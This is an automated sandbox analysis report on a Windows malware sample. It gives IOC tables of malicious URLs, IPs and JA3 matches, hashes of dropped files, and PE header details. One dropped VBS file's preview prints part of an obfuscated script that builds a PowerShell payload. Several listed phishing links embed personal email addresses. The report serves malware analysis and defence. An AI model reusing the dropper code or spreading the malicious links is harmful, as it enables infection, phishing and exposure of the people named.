                                                                                          https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwxzhlqqgub8rchwk_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bioaguabrasil.com.br/c63a5/0ibbcmvfccobt1ru40aael864dimea/ruixian.wang@huawei.comGet hashmaliciousScreenConnect ToolBrowse
                                                                                          • 185.166.143.48
                                                                                          https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwgpxp66dumoglzvq_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bioaguabrasil.com.br/c63a6/yqfroqxuuz8idjj1hn2brw3g7czoqi/marian@ferax.com.plGet hashmaliciousScreenConnect ToolBrowse
                                                                                          • 185.166.143.50
                                                                                          https://nuance-pdf-professional2.software.informer.com/7.2/Get hashmaliciousUnknownBrowse
                                                                                          • 185.166.143.50

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          ASLINE-AS-APASLINELIMITEDHKhttp://1wprru.lifeGet hashmaliciousUnknownBrowse
                                                                                          • 154.197.121.128
                                                                                          PO#910663595.exeGet hashmaliciousFormBookBrowse
                                                                                          • 213.176.96.198
                                                                                          random.exeGet hashmaliciousAmadey, AsyncRAT, LummaC Stealer, PureLog Stealer, RedLine, Stealc, VidarBrowse
                                                                                          • 62.60.226.64
                                                                                          dDFw6mJ.exeGet hashmaliciousVidarBrowse
                                                                                          • 62.60.226.64
                                                                                          E41ACurBrc.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RedLine, VidarBrowse
                                                                                          • 62.60.226.64
                                                                                          https://bet3659985.com/Get hashmaliciousUnknownBrowse
                                                                                          • 154.197.92.136
                                                                                          Salimuyu.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                          • 62.60.226.37
                                                                                          8FoLmElXOp.exeGet hashmaliciousFormBookBrowse
                                                                                          • 107.148.150.76
                                                                                          Bo7KMzo3y4.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 107.148.150.76
                                                                                          dwYcCLXXTF.exeGet hashmaliciousFormBookBrowse
                                                                                          • 107.148.150.76
                                                                                          AMAZON-02USdlr.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                          • 54.171.230.55
                                                                                          https://doxnero.sg-azure.top/Get hashmaliciousUnknownBrowse
                                                                                          • 76.76.21.21
                                                                                          LaudoBombeiro.msiGet hashmaliciousAteraAgentBrowse
                                                                                          • 13.35.58.31
                                                                                          https://doxnero.sg-azure.top/Get hashmaliciousUnknownBrowse
                                                                                          • 76.76.21.21
                                                                                          https://doxnero.sg-azure.top/Get hashmaliciousHTMLPhisherBrowse
                                                                                          • 76.76.21.21
                                                                                          https://2fa.com-token-auth.com/XaDg2clM2YnpKT1lnV2s1NzFwQUphUGNLajE5WkFsWG1aYVVxamhmckZlM3VwMkZkQktJNlMxazRhenRTMFdNdEdybll5UExNM0F1ODd5NU4rblJ3V1hKRVhTZDZDZGhUSHhiY2Z6RERJYjVHMVpKbHRuVnJQdjdTN0x5UFdWTVBDUi9jdEFwNlU1YnExRXJlK2FVeHRqZWx3TFU2WStPd0lMQnNvR2tzYjBLcXQ3cDJveUFabEYxUmk1dTFlYTRPZFN1aHdEMjNHZXUxaHRMOVdaeTBISklEMUpZME9nPT0tLWR0bHdLN3lqZUJPVVI5YnAtLXRpa1lsc2hYNnVaUkF4TVhXMTl2M1E9PQ==?cid=2399161896Get hashmaliciousKnowBe4Browse
                                                                                          • 54.231.170.152
                                                                                          https://opnform.com/forms/sterling-seacrest-pritchard-f5yh4d/Get hashmaliciousUnknownBrowse
                                                                                          • 3.167.227.87
                                                                                          https://webgeo.co/prod1/portal/portal.jsp?c=556275707&p=556651251&g=556651259&id=575826306Get hashmaliciousUnknownBrowse
                                                                                          • 54.187.159.182
                                                                                          botnet.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                          • 18.224.211.105
                                                                                          https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFkF-2B2O7FNVDtEn7eLCg79KlX5G84IMpmk8M6ri2Vxg6C8-yF_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZMXg-2FLON9H7IisNa7-2FMldO-2FR3HOYlJJtNlYWzE4oc4yZxIgvOftMYP-2BXgKsio2Q6589B1x8hawo7hbmdPcls9tPnKo66VXX3Tn-2BcXM44gBUpU5F6RI6HcAMwO3LhxcNNwkYtK-2FqAo2C3T1UGbgJlVXQ0xctNXiRk9-2FCJaFtjFg-2BJc35OL7TZrBL1g4Puk-2BccaK2xqac6-2FG1JoGVNooXDsYP9cJzDJo5uqnAluX75NFp6m5Pd9RiM08Fi-2Fw0-2FgSQNmg-3D#Fshawn@kinexuscpa.comGet hashmaliciousHTMLPhisherBrowse
                                                                                          • 18.245.60.74
                                                                                          FASTLYUSMc3FDUMnVz.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog StealerBrowse
                                                                                          • 185.199.111.133
                                                                                          rH3TpuMpZn.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Quasar, RedLine, VidarBrowse
                                                                                          • 185.199.111.133
                                                                                          https://app.ludus.one/d1aa995b-e836-40c9-8544-b658868b60c7Get hashmaliciousHTMLPhisherBrowse
                                                                                          • 151.101.130.217
                                                                                          https://app.ludus.one/d1aa995b-e836-40c9-8544-b658868b60c7Get hashmaliciousHTMLPhisherBrowse
                                                                                          • 151.101.130.217
                                                                                          LaudoBombeiro.msiGet hashmaliciousAteraAgentBrowse
                                                                                          • 199.232.214.172
                                                                                          https://2fa.com-token-auth.com/XaDg2clM2YnpKT1lnV2s1NzFwQUphUGNLajE5WkFsWG1aYVVxamhmckZlM3VwMkZkQktJNlMxazRhenRTMFdNdEdybll5UExNM0F1ODd5NU4rblJ3V1hKRVhTZDZDZGhUSHhiY2Z6RERJYjVHMVpKbHRuVnJQdjdTN0x5UFdWTVBDUi9jdEFwNlU1YnExRXJlK2FVeHRqZWx3TFU2WStPd0lMQnNvR2tzYjBLcXQ3cDJveUFabEYxUmk1dTFlYTRPZFN1aHdEMjNHZXUxaHRMOVdaeTBISklEMUpZME9nPT0tLWR0bHdLN3lqZUJPVVI5YnAtLXRpa1lsc2hYNnVaUkF4TVhXMTl2M1E9PQ==?cid=2399161896Get hashmaliciousKnowBe4Browse
                                                                                          • 199.232.192.193
                                                                                          https://us-west-2.protection.sophos.com/?d=powerbi.com&u=aHR0cHM6Ly9hcHAucG93ZXJiaS5jb20vdmlldz9yPWV5SnJJam9pWWpBNU5UZGtPVEl0T1RVNVpDMDBNVEl3TFRrNFpqVXROR1U1T0dWaU5XVTVNRE01SWl3aWRDSTZJakUxTVdNeE5qWmxMV00zWldFdE5HSTFaQzFoTWpRM0xUTmtNVEF5TlRFelkySXdNeUo5&i=NjAzNTFlYmUxMmQ2N2MzMjNhNzYzZDg0&t=cXRBVTE0Z3RLSGRTdEd4cm1WNzFhUm4wLzUzdXZKYklHYmduYnhYNlpsVT0=&h=5e715a0526a946bcaa614abc851141f0&s=AVNPUEhUT0NFTkNSWVBUSVYXtWfTC_gnxLfx0tqsdWatsuMxIHchoBDvy0tVrFrMxgGet hashmaliciousUnknownBrowse
                                                                                          • 151.101.2.137
                                                                                          https://opnform.com/forms/sterling-seacrest-pritchard-f5yh4d/Get hashmaliciousUnknownBrowse
                                                                                          • 151.101.194.137
                                                                                          https://webgeo.co/prod1/portal/portal.jsp?c=556275707&p=556651251&g=556651259&id=575826306Get hashmaliciousUnknownBrowse
                                                                                          • 151.101.128.176
                                                                                          http:///sites.google.com/view/drive-u-7-home/Get hashmaliciousUnknownBrowse
                                                                                          • 151.101.130.49

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          3b5074b1b5d032e5620f69f9f700ff0eMc3FDUMnVz.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog StealerBrowse
                                                                                          • 185.166.143.49
                                                                                          • 185.199.108.153
                                                                                          https://app.ludus.one/d1aa995b-e836-40c9-8544-b658868b60c7Get hashmaliciousHTMLPhisherBrowse
                                                                                          • 185.166.143.49
                                                                                          • 185.199.108.153
                                                                                          https://doxnero.sg-azure.top/Get hashmaliciousUnknownBrowse
                                                                                          • 185.166.143.49
                                                                                          • 185.199.108.153
                                                                                          createdbetterthingswithbestgoodthings.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                          • 185.166.143.49
                                                                                          • 185.199.108.153
                                                                                          https://www.itsnoneofyourbaddytimesup.com/lLGTHo9Get hashmaliciousHTMLPhisherBrowse
                                                                                          • 185.166.143.49
                                                                                          • 185.199.108.153
                                                                                          https://webgeo.co/prod1/portal/portal.jsp?c=556275707&p=556651251&g=556651259&id=575826306Get hashmaliciousUnknownBrowse
                                                                                          • 185.166.143.49
                                                                                          • 185.199.108.153
                                                                                          FACTURA SOLICITADA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 185.166.143.49
                                                                                          • 185.199.108.153
                                                                                          https://click.rewardlink.com/?upn=dXJsPWFIUjBjSE02THk5amIyUmxjeTV5WlhkaGNtUmpiMlJsY3k1amIyMHZjakl2TVM5eVluZEhTRnBZYVVkb2FUVnVSbEUzT1ZaR1dFaHhXblZuUTJoNldHMWljbXB1VUZWR1JtMVRXVmh0TURaNVRtWm9OMlJRYjJWVGFIbHlVRTlhYzAxUCZkZWxpdmVyeUlkPTE3MjY0ODY0NSZlbWFpbEFkZHJlc3M9YmZhbmd1eUB1c2NvcnRlYy5jb20=Get hashmaliciousUnknownBrowse
                                                                                          • 185.166.143.49
                                                                                          • 185.199.108.153
                                                                                          rNovaconsultaP232687_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                          • 185.166.143.49
                                                                                          • 185.199.108.153
                                                                                          Quotation.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 185.166.143.49
                                                                                          • 185.199.108.153

                                                                                          Dropped Files

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          C:\Users\user\AppData\Roaming\XenoManager\Vbc.exeRFQ#003110-Al Nasr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            PI and payment confirmed pdf.exeGet hashmaliciousRemcosBrowse
                                                                                              EjyI1K8H1L.exeGet hashmaliciousQuasarBrowse
                                                                                                HAVqwf064o.exeGet hashmaliciousQuasarBrowse
                                                                                                  Purchase_order.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                    SecuriteInfo.com.Win32.CrypterX-gen.18920.7401.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.5956.28112.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        LxzE0wDnVoi4VKU.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          SecuriteInfo.com.W32.AIDetectNet.01.10857.exeGet hashmaliciousBluStealer, SpyExBrowse
                                                                                                            Doc0627.exeGet hashmaliciousBluStealer, SpyExBrowse

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Vbc.exe.log

                                                                                                              Download File
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                              File Type:CSV text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):226
                                                                                                              Entropy (8bit):5.360398796477698
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                                              MD5:3A8957C6382192B71471BD14359D0B12
                                                                                                              SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                                              SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                                              SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                                              Malicious:false
                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):64
                                                                                                              Entropy (8bit):1.1940658735648508
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nlllulh49//lz:NllUu9//
                                                                                                              MD5:AADE84B9650AB09D8DC304B168D6D555
                                                                                                              SHA1:17BC4180A60DBFF0B3F9BF8E5C5987D452D1D868
                                                                                                              SHA-256:2C79C35AD1C4DFF21408F447C6AD565ACC3BDE8C8869108C8AA2F05B79539090
                                                                                                              SHA-512:594C57CC7D421DD576EA05344E4EA8179D93295003638AD34A634BB5632B88DF65B7AEB52515E50CA060DA57F7BC6553C0193FF1931CB95D9BDEC3845779045D
                                                                                                              Malicious:false
                                                                                                              Preview:@...e................................................@..........

                                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):15146
                                                                                                              Entropy (8bit):5.440992384635616
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:6XIpwHqJVlBYos2MKni4juj4iQFpAR7c7NF9Wu0MDxpnO/9iCn:/hHBYTlZWF20v10MFpWiI
                                                                                                              MD5:51868B18B3FD5A5358969E8778770BEC
                                                                                                              SHA1:370E82B9B6C79F5111EA3CF4EE3ACCEFF1763400
                                                                                                              SHA-256:E1219C4B024AEACF2B6637D1ABABC373A5B89FA084E79B887608103CD4D85702
                                                                                                              SHA-512:6E00DA6277381AF4DB7C17FF8B964751AC9C035940C78B808E0C7B38F1080EE7DD7858705348C19C8E2FC4E52C1B891B09B80F7CA6BA5BDBCBEE468B1DEDFB13
                                                                                                              Malicious:true
                                                                                                              Preview: 'g..IjronFcnmih = rRegisggfgdsadffghgjg211 & ""..kimAIjFcf = TimeSerial(9,8,9)..kimAIjFcf = TimeSerial(9,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..Call Ugsfisging("$do" & "sigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@Z")..Call Ugsfisging("wBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I")..cAfhmdkd = TimeSerial(8,9,8)..Public Const frnbrmpb = "FobdSdj"..eikbacoIh = "hffhfg" & LenB("mkijkodI") & "hfg"..'iFhIIkho ohprdhA..gnbSmIk = TimeSerial(7,9,8)..Public Const akSeegcfi = "gkgIcmk"..Call Ugsfisging("@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@B")..Call Ugsfisging("l@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu")..Call Ugsfi

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0gjemtyq.ctl.psm1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ci51qyu.r02.ps1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_abj210rn.hbs.ps1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jtoycv5y.bng.ps1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qhqammmi.1gp.psm1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txhn5u2p.fkq.psm1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe

                                                                                                              Download File
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2625616
                                                                                                              Entropy (8bit):6.344611118010868
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:S6F5PsH1IaspqACp//9NqqAJN77F29ZJOx2uc:jw16psLqqAJN77F29jOx27
                                                                                                              MD5:0A7608DB01CAE07792CEA95E792AA866
                                                                                                              SHA1:71DFF876E4D5EDB6CEA78FEE7AA15845D4950E24
                                                                                                              SHA-256:C16336AB32195B08C1678220FBE0256FEE865F623E2B32FCFA4D9825FD68977E
                                                                                                              SHA-512:990A6FA1B8ADB6727B1DCD8931AD84FDCB556533B78F896A71EAE2A7E3AE3222E4B8EFAA4B629CED2841211750E0D8A75DDD546A983C2E586918DD8BA4E0DC42
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: RFQ#003110-Al Nasr.exe, Detection: malicious, Browse
                                                                                                              • Filename: PI and payment confirmed pdf.exe, Detection: malicious, Browse
                                                                                                              • Filename: EjyI1K8H1L.exe, Detection: malicious, Browse
                                                                                                              • Filename: HAVqwf064o.exe, Detection: malicious, Browse
                                                                                                              • Filename: Purchase_order.js, Detection: malicious, Browse
                                                                                                              • Filename: SecuriteInfo.com.Win32.CrypterX-gen.18920.7401.exe, Detection: malicious, Browse
                                                                                                              • Filename: SecuriteInfo.com.Win32.PWSX-gen.5956.28112.exe, Detection: malicious, Browse
                                                                                                              • Filename: LxzE0wDnVoi4VKU.exe, Detection: malicious, Browse
                                                                                                              • Filename: SecuriteInfo.com.W32.AIDetectNet.01.10857.exe, Detection: malicious, Browse
                                                                                                              • Filename: Doc0627.exe, Detection: malicious, Browse
                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........).*QH.yQH.yQH.y..-yPH.y..,y_H.y...yTH.y...yPH.yO.^ySH.y.).xRH.y.(.xWH.y.(.x_H.y.(.xNH.y.(.x\H.y...y@H.yQH.y)I.y.).x:H.y.).xPH.y.)2yPH.y.).xPH.yRichQH.y........PE..L..."D.]..........".......!...................!...@..........................0(......(...@...... ....................!.V.....".......#.L.............'.PB....&.00..`...T................... ...........@............."..............................text...F.!.......!................. ..`.data...H.....!.......!.............@....idata..>.....".. ....".............@..@.tls..........".......".............@....rsrc...L.....#.......".............@..@.reloc..00....&..2....&.............@..B................................................................................................................................................................................................................................

                                                                                                              \Device\ConDrv

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe
                                                                                                              File Type:ASCII text, with very long lines (304)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):6809
                                                                                                              Entropy (8bit):4.315080724582697
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:zKcDGKD7zrrRYZZ/HPw4//HP/HH6K1jqQiGyGTFchzCKtihKCsO2b0N/+7vKAKPO:VrRYZXCKgQifr8sC/635P
                                                                                                              MD5:BF06030E740D56E94EE78B0CE7A3AA98
                                                                                                              SHA1:54884365A2FADBFB5AC48F01026D5A0EA14B89E6
                                                                                                              SHA-256:A6BC3067D98446F82CE6ADB6E0E052294D4F46ACFA2ED07CB6C2F4D437623407
                                                                                                              SHA-512:B44F05B5A0C286D5A0461607E400028A9E0198CF4A1B1A082840A5727FD5619D8085C30A456DFB0A144281CCFA24DF709A1020E2B72A94F1FBABD7679B6156AE
                                                                                                              Malicious:false
                                                                                                              Preview:Microsoft (R) Visual Basic Compiler version 14.8.4084.for Visual Basic 2012.Copyright (c) Microsoft Corporation. All rights reserved...This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to Visual Basic 2012, which is no longer the latest version. For compilers that support newer versions of the Visual Basic programming language, see http://go.microsoft.com/fwlink/?LinkID=533241.. Visual Basic Compiler Options.. - OUTPUT FILE -./out:<file> Specifies the output file name../target:exe Create a console application (default). (Short form: /t)./target:winexe Create a Windows application../target:library Create a library assembly../target:module Create a module that can be added to an assembly../target:appcontainerexe Create a Windows application that runs in AppContainer../ta

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                              Entropy (8bit):6.848921649188907
                                                                                                              TrID:
                                                                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
                                                                                                              File size:163'328 bytes
                                                                                                              MD5:6159b2025a32b10d721f03c7141577d8
                                                                                                              SHA1:829beb712c7ad268f05865bc982d9db519079433
                                                                                                              SHA256:8db64fb78d54b15b0648d454b3678b0200431114cb1058d70f4783278b7feb70
                                                                                                              SHA512:b6fd30a5c76d40b0949a34de2dba060bc915ccc0dc6fcc0b8050da9a064ff0f8c487cac4b1fa7b16d545c4c31d77f4a9aedb3997e17e96e3af60b724d60cfa22
                                                                                                              SSDEEP:3072:EahKyd2n31zf5GWp1icKAArDZz4N9GhbkrNEk1QOwgT:EahOzp0yN90QEOwc
                                                                                                              TLSH:E7F39D4A63E420B6E4B657B498F202975A32BCB15B7982FF12C4D57E0E336C0A532F57
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."

                                                                                                              File Icon

                                                                                                              Icon Hash:3b6120282c4c5a1f

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x140008200
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x140000000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:10
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:10
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:10
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              dec eax
                                                                                                              sub esp, 28h
                                                                                                              call 00007FE4A8E501E0h
                                                                                                              dec eax
                                                                                                              add esp, 28h
                                                                                                              jmp 00007FE4A8E4FA8Bh
